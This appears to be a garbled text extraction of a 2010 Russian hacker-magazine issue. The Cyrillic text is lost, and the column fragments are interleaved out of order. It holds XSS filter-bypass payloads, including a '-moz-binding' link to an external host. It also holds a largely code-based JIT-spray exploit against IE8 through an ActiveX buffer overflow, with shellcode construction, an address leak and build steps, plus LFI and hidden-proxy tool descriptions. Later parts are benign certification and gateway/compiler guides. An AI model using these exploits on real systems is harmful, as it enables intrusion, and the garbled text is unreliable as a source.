<sc\uFEFFript>aler\uFEFFt('XSS')</
scr\uFEFFipt>

\uFEFF ,
.

,
,
.
, , \uFEFF BOM,
.
FireFox mozilla.org/security/
announce/2008/mfsa2008-43.html

, ,
,
IDS/IPS, WAF
. bestfit mapping .
,
, - .
,
.

, , ,
.
.
best-fit mapping
. - ,


, .
,
.
,
X 05 /136/ 10

45 Unicode-Buffer
Overflows, Unicode-.

Fiddler -
.
U+2032 . ,
, .
, (Chris
Weber),

best-fit?
, .

, .
,
:
?moz?binding: url(http://
nottrusted.com/gotcha.xml#xss)

,
,
U+2212. best-fit,
U+002D, ,
CSS-, XSS-.
,
.
, .
,
JavaScript ,
, SQL-.

,
.

. ,
. ,
X 05 /136/ 10

:
1.

.
2. NFC
,
.
3. .
,
.
,
,
. :). ,
,

. .
:
ABC
ASCII:
\x41\x42\x43
Unicode:
\x41\x00\x42\x00\x43\x00

- ,

ASCII-,
. , -

.
, Unicode-
. (Chris Anley),
, .
,

venetian exploit.

-, ,
, , .


. , ,
,
, ,
.
(
) ,
.

,
,

, UTF-8,
, ..

XSS
.
,
, ,
. ,
.
, .
,
, , ,
.

HAPPY END?!

, ,

. .
,
, .
, . ,
,

. ,

.
,
.z

063


, Digital Security dookie@inbox.ru

JIT SPRAY

IE8
JIT-

hardware DEP ASLR IE8


JIT Spray. , JIT-,
, , - .

,
ASLR+DEP IE8 . Aurora,
Google,
IE,
IE6/IE7.
, 2010
BlackHat DC 2010 ,
ASLR, DEP IE8. ,
,
,
.
,
. Immunity
Canvas
Aurora IE8
Windows 7. , -,
.
.

PREVIOUSLY ON ][.

][,
,
hardware DEP.

064


.
ActiveX,
,
. ,
ActiveX emsmtp.dll
QuikSoft EasyMail.

SubmitToExpress().
256 ,
,
ESI, SEH.
cccc260ccccAAAAffffBBBBfffffffff
fffffffffffffffffffffffDDDD
ESI = AAAA
RET = BBBB
SEH = DDDD

IE8 !

IE8 hardware DEP.



.
,
DEP iexplore. Heap Spray

. .
, IE.
Flash,
.
, . DEP .
, IE8 permanent
DEP. DEP
SetProcessDEPPolicy,
NtSetInformationProcess. DEP.
NtSetInformationProcess
Access Denied.
ASLR,
, . 256 .

JIT SPRAY

.
(Dionysus Blazakis)
BlackHat DC 2010 , DEP ASLR
IE8.
- , , . ,
,
X 05 /136/ 10

Permanent DEP

permanent DEP? JIT-,


. JIT-
ActionScript.
AS ,
SWF-. Flash ,
IE8. ,
, , .
Flash , .

, . ,
. ActionScript ,

cmd.exe. .
, ActionScripte
var ret=(0x3C909090^0x3C909090^0x3C909090^0x
3C909090^ );

:
0x1A1A0100:
0x1A1A0105:
0x1A1A010A:
0x1A1A010F:

359090903C
359090903C
359090903C
359090903C

XOR
XOR
XOR
XOR

EAX,
EAX,
EAX,
EAX,

3C909090
3C909090
3C909090
3C909090

? 0x35 XOR EAX,


.

, , , , :
0x1A1A0101:
0x1A1A0102:
0x1A1A0103:
0x1A1A0104:
0x1A1A0106:
0x1A1A0107:
0x1A1A0108:
0x1A1A0109:

90 NOP
90 NOP
90 NOP
3C35 CMP AL, 35
90 NOP
90 NOP
90 NOP
3C35 CMP, AL 35

0x3C , ,
CMP AL. ,
XOR EAX 0x35. , XOR , NOP ,
NOP .
,
ActionScript.
.
,
. , Flash
? ASLR,
. . -,
X 05 /136/ 10

JIT-,
HeapSpray.
, .
ASLR, .
100% Windows XP SP3
, Windows 7. -,
ActionScript
.
XP SP3, .
, ,
. ,
Tamarin (
Flex SDK),
SWFTOOLS.

, :
, MetaSploit, .
. JIT- XOR EAX.
.
XOR.
.
, , ,
. . ,
:
1. (, MetaSploit)
ActionScript.
2.
.
3. JIT-Spray. JIT .
4. JIT-Spray.
5. JIT VirtualProtect.
6. JIT VirtualProtect
.
7. JIT ,
MetaSploit.
ActionScript.
, HeapSpray. ,
, \x11\x22\x33\
x44, AS : \u2211\
u4433. (
),
perl AS.
,
JIT- , , .
Dictionary.
Dictionary -,
. :

HTTP://WWW
links
HeapSpray
Flash:
roeehay.
blogspot.com/2009/08/
exploitation-ofcve-2009-1869.html

:
semantiscope.com/
research/BHDC2010/
BHDC-2010-Paper.pdf

JIT-SPRAY :
dsecrg.com/pages/pub/
show.php?id=22
SWFTOOLS:
swftools.org

var dict = new Dictionary();


var key = "key";

065


dict[key] = "Value1";
dict["key"] = "Value2";


()
, .
, key . 32 ,
3 , 29 .
.
Integer, 29 ,
3 . ActionScript
, .
Dictionary, ,

,
.
,
, ,
. .
Dictionary
,
.
( :)).
var shellcode="shellcode";
var even = new Dictionary();
var odd = new Dictionary();
//
for (i = 0; i < (1024 * 1024 * 8);
i += 1) {
even[i * 2] = i;
odd[i * 2 + 1] = i;
}
//
even[shellcode] = 1;
odd[shellcode] = 1;

,
, .
for (curr in even) {
//
if (curr == shellcode)
{ break; } //
evenPrev = curr;
}
for (curr in odd) {

066

if (curr == shellcode)
{ break; }
oddPrev = curr;
}

Dictionary
, , .

, ,
17 , (

-).
.
//ptr

if (evenPrev < oddPrev) {
ptr = evenPrev;
if (evenPrev+8+9 != oddPrev)
{ //
return 0;
}
} else {
ptr = oddPrev;
if (oddPrev+8+9 != evenPrev) {
return 0;

}
}
ptr = (ptr + 1) * 8;//
3 8:
(ptr<<3)+8

,
12, .
JIT Spray! , SWF
. ,
.
, , Flash .
,
.
JavaScript .
function pageLoadEx(){
var ldr = new Loader();
var url = "jit_s0.swf";
// JIT-
var urlReq = new
URLRequest(url);
ldr.load(urlReq);
childRef = addChild(ldr);
}
function pageLoad(){
for(var z=0;z<600;z++) {
pageLoadEx();
X 05 /136/ 10

} // 600
ic=ic + 1;
MyTextField1.text=ic +
"- JIT spraying, wait for 4 ...";
if (ic == 4) {
//4 600
clearInterval(ldInt);
MyTextField1.text = ic +
"- done, calling sploit...";
ExternalInterface.call(
"exploit", ptr);
//
}
}
ldInt=setInterval(pageLoad,3500);
//


. :
JIT-, ,
,
.
: JIT
,
ASCII-,

. ,
.
. , 0x01FF001A.
.
: 0x606F6061 0x616F606A.

. [0x60..0x6F]
. JIT ((0x606F60610x60606060)<<4)+(0x616F606A-0x60606060)=
0x01FF001A. ,
8 , retn 8.
, :

var bf=unescape("%63");
// ...260...cccccc

DDDD
var value=targetValue;

3
: retn, retn 4 retn 8.
,
12 . . ,
SWF JIT-
,

.
,
,
0x1000 .
0x010000
. 0x1000 ,

. ASLR,
.
0x1A1A0101.
0x1A1A0000,
,
, JIT-. Flash,
. :

value=decimalToHex(value,8,16);
//

var h11="%6"+value.substring(0,1);
var h12="%6"+value.substring(1,2);
var h21="%6"+value.substring(2,3);
var h22="%6"+value.substring(3,4);
var h31="%6"+value.substring(4,5);
var h32="%6"+value.substring(5,6);
var h41="%6"+value.substring(6,7);
var h42="%6"+value.substring(7,8);
//
var high=h41+h31+h21+h11;
var low =h42+h32+h22+h12;
//
while (buf.length<260) buf=buf+bf;
buf+=unescape("%0a%0a%1a%1a");
// ESI 0
buf+="ffff"+unescape("%01%01%1a%1a");
// = 0x1A1A0101 JIT
buf+=unescape(high); //if ret
buf+=unescape(high); //if ret 4
buf+=unescape(high); //if ret 8 (

var buf="";

emsmtp.dll - ret 8)
buf+=unescape(low);

// 16-

buf+=unescape(low);

function decimalToHex(d,l,rad) {

buf+=unescape(low);

var hex = Number(d).toString(rad);

cccc260ccccAAAAffffBBBBCCCCCCCCCCCCDDDDDDDDDDDD

alert('Try me on 0x' + decimalToH

while (hex.length < l) {


hex = "0" + hex;

ex(targetValue,8,16)+' :-)');
vuln.SubmitToExpress(buf); //

ESI = AAAA 0,
JIT-spray
RET = BBBB JIT

X 05 /136/ 10

return hex;

}
//
function exploit2(targetValue){

function exploit(targetValue) {

067


RAZ0R HTTP://RAZ0R.NAME

JIT , PUSH'a
setTimeout('exploit2('+targetValue+')',5000);
//
}

JIT-SPRAY

JIT-. ,
.
1. 0x7F.
, , XOR
, .
0x00 0x7F.
2. , (JNE/JE, ), Z .
,
XOR. XOR CMP, , ,
Z . ,
(
XOR), , Z 0x7F
. ADD, SUB, XOR, OR, AND .. . AL 0,
Z . ,
PUSH 0x6A.
:
0x1A1A0110: 803F6E
0x1A1A0113: 6A35
0x1A1A0115: 75EF

CMP [EDI], 'n'


PUSH 35
jnz short

3. ,
. 4 ,
XOR 0x35. AL AH.
0x1A1A0110:
0x1A1A0115:
0x1A1A0117:
0x1A1A011a:
0x1A1A011c:
0x1A1A011F:
0x1A1A0121:

B80035B1A1
3C35
B063C4
3C35
B163C3
3C35
50 PUSH EAX

MOV
CMP
MOV
CMP
MOV
CMP

EAX, 0xA1B13500
AL, 35
AL, C4
AL, 35
AH, C4
AL, 35

, .
, . ,
.
function funcXOR1()
{
var jit=(0x3c909090^0x3c909090^ .. // NOP
0x3c44ec83^ // 3583ec443c

sub esp, 44 ;


0x3c90C033^ // 3533C0903c

xor eax, eax

0x3c9030b0^ // 35b030903c

mov AL,

0x3c008b64^ // 35648b003c

mov eax, fs:[eax]

0x3c0c408b^ // 358b400c3c

mov eax,

fs:[eax+C]

0x3c1c408b^ // 358b401c3c

mov eax,

fs:[eax+1C]

0x3c08508b^ // 358b50083c

NEXT: mov edx,

0x3c20788b^ // 358b78203c

mov edi,

30

[eax+08]

[eax+20] ;

3. . , PUSH 0xA1B1C3C4.
5 , 6 XOR,

068

0x3c90008b^ // 358b00903c

mov eax, [eax]

0x6a6b3f80^ // 35803f6b6a

cmp [edi], 'k' ;

k? "kern"
X 05 /136/ 10

0x3c90eA75^ // 3575eA903c

jnz short

0x3c904747^ // 354747903c

inc edi, inc edi ;

NEXT:


0x3c90016a^ // 356a01903c push 01 ;

Unicode
//
//
//

0x3cd3ff57^ // 3557ffd33c
0x3c90e7ff); // ,

0x3cb89090^ // 359090b83c mov eax, 3c ..


0x3c900000^ // 350000903c

. 0x40 ,

3500000

0x3c9063b0^ // 35b063903c mov ah, 'c'

function Loadzz2(){ var ret1 = funcXOR1();}

0x3c5074b4^ // 35b474503c mov al, 't' and push "ct\0\0"


// 4
"Virt ualP rote ct\0\0"
// , ,
,

0x3c5cc483^ // 3583c45c3c add esp, 5c ;



0x3c909058^ // 355890903c pop eax ;
0x3c08c483^ // 3583c4083c add esp, 08 ;

0x3cb9905a^ // 355a90b93c pop edx ;

0x3c906060^ // 356060903c
0x3c9060b1^ // 35b160903c
0x3c9060b5^ // 35b560903c ecx 0x60606060
0x3c90c12b^ // 352bc1903c sub eax, ecx
0x3c90d12b^ // 352bd1903c sub edx, ecx ;

0x3c04e0c1^ // 35c1e0043c shl eax, 4 ;


0x3c90c203^ // 3503c2903c add eax,edx ;
0x3c90388b^ // 358b38903c mov edi, [eax] ;

0x3c08c783^ // 3583c7083c add edi, 8 ; 8

0x3c406a54^ // 35546a403c push esp and push 40 ;


X 05 /136/ 10

,
NOP XOR. ,
,
,
0x1000 = 4000 . 800 ,
NOP, XOR .
.
. ,
JIT , ,
.
DEP IE8, ,
. :
1. .
2. perl.
3. , 'my' 'our'.
3. AS : perl shellcodegen.pl shellcode_file > jit-spray.as
4. SWF : as3compiler X 320 Y 300 M Loadzz1 jitspray.as
5. , . ,
, Flash.
6. HTML SWF WEB .
, ActiveX
. ,
IE8, .
PDF . z

069


icq 884888

X-TOOLS

: LIBrute
: WINDOWS 2000/2003/XP/VISTA/7
: [X26]VOLAND

. ,
LFI http://site.com/index.
php?page=news&lang=[]%00,
:
1. URL: http://site.com/index.
php?page=news;
2. : GET;
3. : lang;
4. : {STR}%00;
5. : .
:)
: https://
forum.antichat.ru/thread49775.html.

: HTTPREQ
: WINDOWS 2000/2003/XP/
VISTA/7
: [X26]VOLAND


,
Local File
HttpREQ.
Include,
InetCrack
][ .

, [x26]VOLAND .

:
HTTP GUI-;
.

:
;
GUI;
SSL;
HTTPS;
;
(HTTP/HTTPS);
;
;
URL Decimal ;
;

;
;
4 (Query String, GET, POST,
COOKIE);
;
;
2 (
HttpREQ
);
;
;
;
,

;
;
URL Host
;
;
URL;
POST-
; (Content-length);
Url

Hex ( SQL-).
User-Agent;

070

!
HTTP;

MIME-;
HTTP-;

;
-;

;
;
;

;
.NET Framework > 2.0;
-
HttpREQ,
https://forum.
antichat.ru/thread121239.html.

: WINDOWS UNLOCKER
: WINDOWS 2000/2003/XP/
VISTA/7
: DJFLY

win.lock,
Windows
SMS NNNN, ,

(
).
X 05 /136/ 10


DjFly
Windows unlocker.
:
1. (

);
2. ;
3. ;
4. ;
5. IE DrWeb
CureIt ( );
6. ;
7.
;
8.
;
9.
(
);
10. ( );
11. (
);
12. ;
13. *.scr ;
14. hosts.
, , : CD/
DVD/USB , WinUnlocker.exe,
autorun.inf:
[AutoRun]
UseAutoPlay=1
shellexecute=WinUnlocker.exe
action= Windows unlocker
action=@WinUnlocker.exe
label=Windows unlocker
icon=WinUnlocker.exe
Shell\cmd1= Windows
unlocker
Shell\cmd1\Command = WinUnlocker.exe

: DICHECKER
: WINDOWS 2000/2003/XP/VISTA/7
: PROXY-BASE.ORG
.
, DiChecker Socks 4/5
HTTP Proxy-,
X 05 /136/ 10

PHP-


. ,
.
:

;
;
( );
URL (
);
( );
.
proxy-base.org.

: PPROXY
: *NIX/WIN
: BONS

-
-, , -, pproxy.
, pproxy : , PHP (pproxy.php), ,
Perl (plocal.pl),
HTTP-.
. , pproxy.php http://
site.com/proxy/pproxy.php,

( 8008):
perl plocal.pl -px http://site.com/
proxy/pproxy.php

: - pproxy.
php (http://site1.com/proxy/pproxy.php http://
site2.com/proxy/pproxy.php),

:
perl plocal.pl -px http://site1.com/
proxy/pproxy.php
perl plocal.pl -px http://site2.
com/proxy/pproxy.php -tpx http://

localhost:8008 -bp 8009

8009
localhost site1.com
site2.com target.

Tor.
Tor+Privoxy (
8118):
perl plocal.pl -px http://site.
com/proxy/pproxy.php -tpx http://
localhost:8118

,
,
pproxy.php:
$secret = 'pproxypass';

plocal.pl :
perl plocal.pl -px http://site.com/
proxy/pproxy.php -pwd pproxypass

pproxy , Delphi/Pascal
.

: XXTEA CRYPTOR
: *NIX/WIN
: OZA

XXtea Cryptor php-,


php-
xxtea, base64.
XXtea
XTEA, 1998
.
64
,
,
32- (
http://ru.wikipedia.org/wiki/
XXTEA).

,
. z

071


Mifrill maria.nefedova@glc.ru

,
?. ,
, , ,
, ,
, ,
\ , .
,
, ,
.
, IT-
,
, ,
. , ,
:
IT-
, .
, ?
:
,
, .
,
,
. ,
,

074
072


,
.
,

.


, ,
(-,
,
).


,
,
.
, , , ,
-,
. ,

IT .

,
, 15 !

. .
, ,
,
.
,
, .

,
,
-
.
, IT
.
-,

(Oracle, Microsoft, Cisco ..), ,
,

. ,

IT-, , .
, ,
.
? ,
-, ,
X 05 /136/ 10


, .
, , ,
, ,
.

, (,
, ).
-,
, IT- , 5-7

X 05 /136/ 10

. -, :).
, ,
,
,

profit.

, ,
: ,
. ,


.
,
.

,
.
, .
,
IT-
-
. ,

- , (Microsoft, Red
hat, HP, Cisco, Oracle ).

073

MS.
, ? ,
,
,
. ,
, ,
, .
,
,
,
Sun
Certified Developer For Java Web Services
, .
,
,
,
,
.
IT-
-.

, .
,
( ),
, -
,
, ,
.
, IT- , ,
.

.

MICROSOFT

,
. ,
, , (
) ,
.
MS :
:
,
, ,
,
Microsoft;

074

- LPI LEVEL 2
: ,

,
;
:


Microsoft;
:
,
, .

.
,
Office 2007 Microsoft SQL
Server 2008 .
,
www.
microsoft.com/Rus/Learning/MCP/Default.mspx

RED HAT


, Red Hat, , .
40
, .
Red
Hat Enterprise Linux, Red Hat Linux Fedora
Core, .
Red Hat
:
Red Hat Certified Technician (RHCT);
Red Hat Certified Engineer (RHCE);
Red Hat Certificates of Expertise;
Red Hat Certified Security Specialist (RHCSS);
Red Hat Certified Datacenter Specialist
(RHCDS);
Red Hat Certified Architect (RHCA).
, Red Hat
,
,

Red Hat. ,
, ,
.

Red Hat : www.europe.
redhat.com/training


.
MICROSOFT.

LINUX
PROFESSIONAL
INSTITUTE (LPI)


Linux Professional Institute (LPI).
GNU/Linux GNU/Linux-, - ,
.

. :
LPIC Level 1
:
101: General Linux I;
102: General Linux II.
LPIC Level 2
:
201: Advanced Administration;
202: Linux Optimization.
, :
LPIC Level 3
:
321: Windows Integration;
322: Internet Server;
323: Database Server;
324: Security, Firewalls, Encryption;
325: Kernel Internals & Device drivers;
Creating distribution packages;
32x: .

: www.lpi.org.

CISCO

Cisco Systems
80% ,

.
Cisco
X 05 /136/ 10


CISCO.
,
. ,
Cisco .
Microsoft ,
:
Entry, Associate, Professional, Expert,
Specialist.

CCIE (Expert).
:
Routing & Switching, Design, Network Security,
Service Provider, Storage Networking, Voice,
Wireless.
Cisco ,
( , )
. ,
.

: www.cisco.com/web/go/
certifications

COMPTIA (Computing
Technology Industry
Association)



CompTIA. ,
, 28-
.
CompTIA
:
CompTIA A+ ( ,
IT-);
CompTIA Network+;
CompTIA Security+;
CompTIA Server+;
CompTIA Linux+;
CompTIA PDI+;
CompTIA RFID+;
CompTIA Convergence+;
CompTIA CTT+;
CompTIA CDIA+;
CompTIA Project+.
,

IT Fundamentals,
X 05 /136/ 10

EC-COUNCIL.
,
.

ADOBE

, ,
IT IT for Sales,
Green IT,
.
: www.comptia.org

ORACLE

Oracle
Sun Microsystems, Oracle ,
, Java .

: Certified Associate,
Certified Professional, Certified Master, Special
Accreditation, Certified Expert Program
Certified Specialist.
,
, ,
, ,

: www.education.
oracle.com/pls/web_prod-plq-dad/db_pages.
getpage?page_id=39

1C

1
. ,
IT- . , ,
1 ,
, , .
, , :).
1: ,


1:.
1: 8
1: 7.7.
: www.1c.ru/prof/
prof.htm

,
,
.
Adobe Systems Incorporated, ,
,

.
Adobe :
Adobe Certified Expert (ACE), Adobe Certified
Associate (ACA) Adobe Certified Instructor
(ACI).
ACE -
Adobe, ACA ,

Adobe, ACI, ,
.
: www.adobe.com/support/
certification

, ,
,
,

.
, 99% , ,
,
, , , ,
. , , ,
,
-
.



,
,
,
,

075

EXCEL 2000


.



:
. .. : www.
specialist.ru;
,
& Softline Academy: www.ituniversity.ru.
,
, . ,
Thomson Prometric: www.prometric.com VUE:
www.vue.com.
,
,

, .

, ,
, , ,
, . ,
strike back, .

COPMTIA

,
(
),
, , .

.
, ,
,
.

,
IT
IT, . ,

, ,
-
.

, COMPTIA

076

,
, , IELTS:
International English Language Testing
System, TOEFL:
Test of English as a Foreign Language.
:
www.ielts.org
: www.toefl.org
,
- ,
.
Mensa

.
,

,

, IQ , 98%
. , ,
, 100 .
- :).
: www.mensa.org


(Certified Ethical Hacker), International Council of E-Commerce
Consultants (EC-Council).
,
, , ,
.
,
: www.eccouncil.
org/certification/certified_ethical_hacker.aspx z

X 05 /136/ 10

UNIXOID
grinder grinder@ua.fm

Windows
*nix-,

,
.
, , , .
*nix, .
, .

Windows
Firewall Internet Connection Sharing (
) ,
. ,
, , , ,
UserGate Proxy & Firewall, NetworkShield
Firewall Kerio WinRoute Firewall. ,
,
, .

, ,
. ,

078

(, ,
, ). .

. ,
,
,

,
Windows Firewall, .

, ,

. ,
, DNS

(,
IDS, VPN IP-PBX). ,

,
Linux
,
BSD . , OpenBSD
,
32-64 300 , ,
, ,
.
PF
OpenBSD iptables Linux.
VirtualBox (virtualbox.org),
.
QEMU,
Virtual PC . :
X 05 /136/ 10

VirtualBox
VMware Server ( ),
VMware Player.


,

, VirtualBox Bridged Networking
Driver.
(TCP/IP) Microsoft.
, VirtualBox,
DNS- IP-
(LAN) , (vic1 OpenBSD
eth1 Linux).
Microsoft.
.

(, Wi-Fi), . ,
.
, ,
.

PACKET FILTER

:
# sysctl net.inet.ip.forwarding=1

,
/etc/sysctl.conf.

NAT, pf.conf:
# vi /etc/pf.conf
nat on vic0 from vic1:network to any -> vic0
block in all
pass in on vic1

, vic1, .
.
:
# pfctl -nf /etc/pf.conf
# pfctl -vf /etc/pf.conf
X 05 /136/ 10


PF,

IP-. NAT, :
# pfctl -s state


IP ( )
nmap . , ,
,
:
# vi /etc/pf.conf
tcp_srv = "{ ssh, smtp, domain, www, pop3 }"
udp_srv = "{ domain }"
block all
pass out inet proto tcp to any port $tcp_srv
pass out inet proto udp to any port $udp_srv

/etc/services
, .
pfctl
:

WARNING

warning

VirtualBox
ISO
OpenBSD (install46.
iso),


,
.

# pfctl -s info


ntop pftop. PKG_PATH FTP- (www.
openbsd.org/ftp.html), :
# export PKG_PATH=ftp://ftp.openbsd.org/pub/
OpenBSD/4.6/packages/i386

HTTP://WWW
links
VirtualBox
www.virtualbox.org
FTP
OpenBSD www.
openbsd.org/ftp.html

:
# pkg_add pftop
# pkg_add ntop

Dnsmasq
thekelleys.org.uk/
dnsmasq


,

- Squid.

079

UNIXOID

OpenBSD ,

# pkg_add squid-2.7.STABLE6.tgz

/etc/squid/
squid.conf :
# vi /etc/squid/squid.conf
http_port 3128
### :
# http_port 127.0.0.1:3128 transparent
### IP

acl lan_net src 192.168.1.0/24


###
192.168.1.0/24
http_access allow lan_net
###
, VM
cache_mem 32 MB
maximum_object_size 10240 KB
cache_dir ufs /var/squid/cache 5000 16 256

:
# squid -z
# squid

,
:
# netstat -ant | grep 3128


3128 vnec1

-. , , ,
80 8080
web-, ,
Squid:
# vi /etc/pf.conf
table <clients> { 192.168.1.2,
192.168.1.5 }
table <nocache> { 192.168.1.0/24 }
rdr on inet proto tcp from <clients>
to ! <nocache> port { 80 8080 } ->
127.0.0.1 port 3128

, Squid :
# vi /etc/rc.local
if [ -x /usr/local/sbin/squid ]; then
echo -n 'squid'; /usr/local/sbin/squid
fi

# pkg_add privoxy

,
8118,
http://config.privoxy.org/ ( : http://p.p).
-.
Cookies, pop-up,
. Privoxy
,
LAN
listen-address config.txt, IP
vic1:
listen-address 191.168.1.1:8118

Squid . squidGuard
(www.squidguard.org) HAVP (HTTP Anti Virus
Proxy, www.server-side.de).
,
,
.
# pkg_add squidguard
# pkg_add havp

IPTABLES

iptables -F ,
iptables -t nat -flush NAT
iptables -L

080

squidGuard HAVP ,
][ 2008
, .
,
,
. ,
,
. -
. ,
Squid, Privoxy (Privacy Enhancing Proxy, privoxy.
org)
-.
Privoxy
:

, , Privoxy
,
, ][ 03.2007.
,
squid.conf
:
cache_peer 127.0.0.1 parent \
8118 7 no-query

DNS ( TFTP
DHCP) Dnsmasq (thekelleys.org.uk/
dnsmasq). :
X 05 /136/ 10

sysctl.conf
# pkg_add dnsmasq

dnsmasq.conf ,
:
listen-address=127.0.0.1, 192.168.1.1

DNS-
.

IPSEC OPENBSD
VPN.
IPsec ipsecctl, . ,
192.168.1.0/24, WAN
IP- 1.2.3.4,
LAN - 192.168.2.0/24 WAN 5.6.7.8.
/etc/ipsec.conf :

# vi /etc/ipsec.conf
ike esp from 192.168.1.0/24 to 192.168.2.0/24 \
peer 5.6.7.8
ike esp from 1.2.3.4 to 192.168.2.0/24 \
peer 5.6.7.8
ike esp from 1.2.3.4 to 5.6.7.8

# vi /etc/pf.conf
set skip on { lo vic1 enc0 }
pass quick on vic0 from 5.6.7.8

VPN-
/etc/isakmpd/pubkeys/ipv4/5.6.7.8, /etc/isakmpd/
private/local.pub 5.6.7.8. :
# isakmpd -K
# ipsecctl -f /etc/ipsec.conf

,
( ).
/etc/rc.conf.local :

INFO

info
Ubuntu Server 9.10

192
1
(ubuntu.
com/products/
whatisubuntu/
serveredition/
techspecs).

isakmpd="-K"

C OpenBSD, , . Linux,
, , .

NAT LINUX
Linux Netfilter
iptables. , , , .
:


,
,


,

][
2009 .

# echo 1 > /proc/sys/net/ipv4/ip_forward

/etc/ipsec.conf ,
IP
passive, , ( ):
ike passive esp from 5.6.7.8 to 1.2.3.4

PF
, ,
,
:
X 05 /136/ 10

:
# sysctl -w net.ipv4.ip_forward=1

,
/etc/sysctl.conf:
net.ipv4.ip_forward = 1

, sysctl
OpenBSD. -

081

UNIXOID

down.d). , /
etc/networks/interfaces :
# vi /etc/networks/interfaces
###

pre-up iptables-restore < /etc/


iptables.rules

CentOS :
# service iptables save

/etc/
sysconfig/iptables.
/etc/sysconfig/
iptables-config:
# vi /etc/sysconfig/iptables-config
IPTABLES_SAVE_ON_STOP="yes"
IPTABLES_SAVE_ON_RESTART="yes"

Privoxy -
.
CentOS/Fedora
:
# system-config-securitylevel

# iptables -t nat -A POSTROUTING -o


eth0 -j MASQUERADE
# iptables -A FORWARD -i eth0 -o eth1
-m state --state RELATED,ESTABLISHED
-j ACCEPT
# iptables -A FORWARD -i eth1 -o eth0
-j ACCEPT

iptables
:
# iptables -L -v

, .
. Squid . Debian/
Ubuntu:
# apt-get install squid

# service iptables status


chkconfig.
iptables:
# chkconfig --list iptables

:
# chkconfig iptables on

( )
eth1, eth0. NAT
Linux ,
:


:
iptables -A OUTPUT -j ACCEPT -m state
--state NEW,ESTABLISHED,RELATED -o
eth0 -p tcp -m multiport --dports
80,443,8080 --sport 1024:65535

# yum install squid

,
iptables:

NAT ,
Ubuntu iptables
iptables-save:

iptables -t nat -A PREROUTING -i eth1


-p tcp -m tcp --dport 80 -j DNAT --todestination 192.168.1.1:3128

# iptables-save > /etc/iptables.rules

iptables -t nat -A PREROUTING -i eth0


-p tcp -m tcp --dport 80 -j REDIRECT
--to-ports 3128

, (,
/etc/network/if-post-

PFCTL
pfctl -f /etc/pf.conf pf.conf
pfctl -nf /etc/pf.conf
pfctl -Nf /etc/pf.conf NAT
pfctl -Rf /etc/pf.conf
pfctl -sn NAT
pfctl -sr
pfctl -ss
pfctl -si
pfctl -sa

082

CentOS:

Squid Adzapper (adzapper.sf.net),


squidGuard HAVP.


,
Windows ,
. ,
- ,
, .

, .z
X 05 /136/ 10

zobnin@gmail.com


ccache distcc


. , ,
( BSD Gentoo).
, .
,
, .

,
, .


.

X 05 /136/ 10

,
.
,
.

~/.bashrc:
export CFLAGS='-O0'
export CXXFLAGS=$CFLAGS

FreeBSD Gentoo /etc/make.conf :

083

UNIXOID

gcc, g++, cc c++ distcc

ccache -s

ccache FreeBSD

CFLAGS='-O0'
CXXFLAGS='-O0'

OpenBSD /etc/mk.conf.
,
, . , ,
, - ,
, ,
.

.
,
- .
make , . Make
'-j',
( ,
, ). ,

. , , '-j' . ,
, .
,

2.
'-j'
:
$ ./configure
$ make -j5
$ sudo make install

, , , .
, Gentoo make MAKEOPTS /etc/make.conf. FreeBSD
MAKE_ARGS.
source based
, 10%.
, ,
, tmpfs.
, .
/var/tmp, tmpfs. Gentoo:
$ sudo mount -t tmpfs tmpfs -o size=1G,nr_inodes=1M
/var/tmp/portage

,
(2 ), tmpfs swap,
.
,
.


.
, , ,
.
,
,
.
ccache.
ccache ,
. ,
, ,
.
Ccache .
.
ccache

:
$ CC="ccache gcc" CXX="ccache g++" ./configure

084

X 05 /136/ 10

Samba
ccache

distccmon-gnome


~/.ccache.
1 ,
4 :

ccache.
ccache genkernel, :

$ ccache -M 4G


, ccache
:
$ echo "export CCACHE_DIR=\"/var/tmp/
ccache/\"" >> ~/.bashrc
:
$ rm -rf ~/.ccache
$ ln -s /var/tmp/ccache ~/.ccache

$ sudo genkernel --kernel-cc=/usr/lib/


ccache/bin/gcc --menuconfig all

FreeBSD ,
:
1. ccache:
$ cd /usr/ports/devel/ccache
$ sudo make install clean
2. /etc/make.conf:
$ sudo vi /etc/make.conf

ccache ,
. ,
, , , .
ccache . ,

. ccache:
Gentoo FreeBSD.
ccache Gentoo
:
1. ccache:
$ sudo emerge -av ccache

# NO_CACHE
, ccache
.if !defined(NO_CACHE)
CC=/usr/local/libexec/ccache/world-cc
CCX=/usr/local/libexec/ccache/world-c++
.endif
# ccache
.if ${.CURDIR:M*/ports/devel/ccache}
NO_CCACHE=yes
.endif

# ccache
FEATURES="ccache"
#
CCACHE_DIR="/var/tmp/ccache/"
#
CCACHE_SIZE="4G"
X 05 /136/ 10

info

Gentoo


(. /etc/
portage/package.
cflags).

ccache
distcc .

PORTAGE_NICENESS
/etc/make.
conf
Gentoo
,


.

2. ~/.cshrc ( ~/.bashrc):
$ sudo vi ~/.cshrc

2. /etc/make.conf:
$ sudo vi /etc/make.conf

INFO

# ccache
setenv PATH /usr/local/libexec/ccache:$PATH
setenv CCACHE_PATH /usr/bin:/usr/local/bin
setenv CCACHE_DIR /var/tmp/ccache
setenv CCACHE_LOGFILE /var/log/ccache.log
#
if ( -x /usr/local/bin/ccache ) then

ccache
distcc
.
Gentoo

,

FEATURES="ccache
distcc" /etc/
make.conf.

085

UNIXOID

/usr/local/bin/ccache -M 4G > /dev/null


endif

ccache make install clean:

, ,
distcc-config ( ,
DISTCC_HOSTS):
$ sudo distcc-config --set-hosts "127.0.0.1
192.168.0.1 192.168.0.2 192.168.0.3"

$ sudo make NO_CACHE=yes install clean


.
( ),
,
. ,
distcc.
Distcc gcc,

. , distcc

- . ,
-
.
distcc
. ,
, ,
. , ,
.
- . , ,
Linux, *BSD, Solaris Windows ( gcc
distcc cygwin), gcc
.
distcc , .
Gentoo FreeBSD
. Gentoo
distcc, .
distcc :
$ sudo emerge distcc

- /etc/make.
conf:
$ sudo vi /etc/make.conf
#
MAKEOPTS="-j8"
# distcc
FEATURES="distcc"
# distcc
DISTCC_DIR="/tmp/.distcc"

MAKEOPTS . :
/ * 2 + 1.
, , , ,
.

086

IP- DNS- .
,
, . ,
192.168.0.1 , : 192.168.0.1/5.
.
/etc/conf.d/distccd,
, :
DISTCCD_OPTS="${DISTCCD_OPTS} -allow 192.168.0.0/24"

:
$ sudo rc-update add distccd default
$ sudo /etc/init.d/distccd start

distcc. distcc, :
$ sudo genkernel --kernel-cc=distcc all

Gentoo, FreeBSD , distcc,


. distcc
:
$ cd /usr/ports/devel/distcc
$ sudo make install clean

, . distcc /etc/rc.conf ,

:
distccd_enable="YES"
distccd_flags="--nice 5 --allow 192.168.1.0/24
